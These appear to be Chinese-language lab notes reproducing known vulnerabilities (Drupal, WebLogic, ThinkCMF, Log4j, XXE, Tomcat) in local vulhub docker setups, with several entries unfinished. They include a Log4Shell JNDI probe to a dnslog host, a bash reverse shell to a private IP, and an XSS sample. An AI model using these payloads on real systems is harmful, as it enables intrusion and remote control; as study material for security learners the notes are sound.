以下是一些已知的漏洞及其相关信息,供研究和复现使用
CVE-2019-6341✔
在 kali 上使用 vulhub 环境,先进入目录vulhub/drupal/CVE-2019-6341
1 | # 启动 docker,启用环境 |

在浏览器访问:http://127.0.0.1:8080

1 | # 上传 POC |


漏洞利用 drupal 文件上传模块,文件内容是 HTML 代码,但 JS 代码包含其中
<SCRIPT>alert(123);</SCRIPT>
CVE 2014-4210✔
vulhub/weblogic/ssrf at master · vulhub/vulhub (github.com)
在 kali 上使用 vulhub 环境,先进入目录vulhub/weblogic/ssrf
1 | # 启动 docker,启用环境 |

Weblogic 中存在一个 SSRF 漏洞,利用该漏洞可以发送任意 HTTP 请求,进而攻击内网中 redis、fastcgi 等脆弱组件。
访问http://127.0.0.1:7001/uddiexplorer/,查看 uddiexplorer 应用。
点击 Search Public Registries 进行抓包



未完……
thinkcmf-x1.6.0-x2.2.3✔
ThinkCMF 是一个基于 ThinkPHP 框架开发的内容管理框架。可利用此漏洞构造恶意的url,向服务器写入任意内容的文件,达到远程代码执行的目的
下载ThinkCMF2.2.2版本,X2.2.2 ·ThinkCMF/CMFX (github.com),解压后放到 phpstudy 环境的 web 根目录下
然后,输入数据库密码 root,设置用户名、密码、邮箱等完成安装设置


log4j2-cve-2021-44228✔
环境搭建
使用 vulhub,切换到漏洞目录
1 | cd /root/vulhub/log4j/CVE-2021-44228 |



漏洞复现
先利用 dnslog 查看回显,然后测试网站
1 | http://127.0.0.1:8983/solr/admin/cores?action=${jndi:ldap://f4ae3u.dnslog.cn} |
工具使用https://github.com/bkfish/Apache-Log4j-Learning/
1 | git clone https://github.com/bkfish/Apache-Log4j-Learning.git |
构造 payload 使用 base 64加密
1 | bash -i >& /dev/tcp/192.168.31.137/8983 0>&1 |
……
XXE 漏洞 | rrodrigo/xxelab✔
环境搭建
1 | # 下载镜像 |
将主机的 8082 端口映射到容器的 80 端口上,在浏览器中访问映射出来的端口,http://localhost:8082

漏洞复现
通过用 burp 抓包发现是 xml 格式
1 | <!DOCTYPE c [ |
Tips / 提示
在 XML 中,实体是可以被引用的对象,类似于变量。当 XML 解析器解析包含该实体的 XML 文档时,它会将实体引用替换为实体的实际值。攻击者可以构造恶意的 XML 数据,将实体引用插入到数据中,从而让 XML 解析器读取和输出 /etc/passwd 文件的内容。

CVE-2017-12615(tomcat-pass-getshell)
环境搭建
使用 vuluhub 的 docker 进行漏洞复现



漏洞复现
……
CVE-2020-14882
允许未授权的用户绕过管理控制台的权限验证访问后台
先找到目录:vulhub/weblogic/CVE-2020-14882
1 | cd vulhub/weblogic/CVE-2020-14882 |
2.进入 vulhub/weblogic/CVE-2020-14882 目录下,使用命令docker-compose up –d启动环境
3.浏览器访问:你的 ip:7001/console/login/LoginForm.jsp 成功访问表示环境搭建成功
log4j2-rce-2021-12-09
环境搭建
1 | # 使用docker |
漏洞复现
……未完待续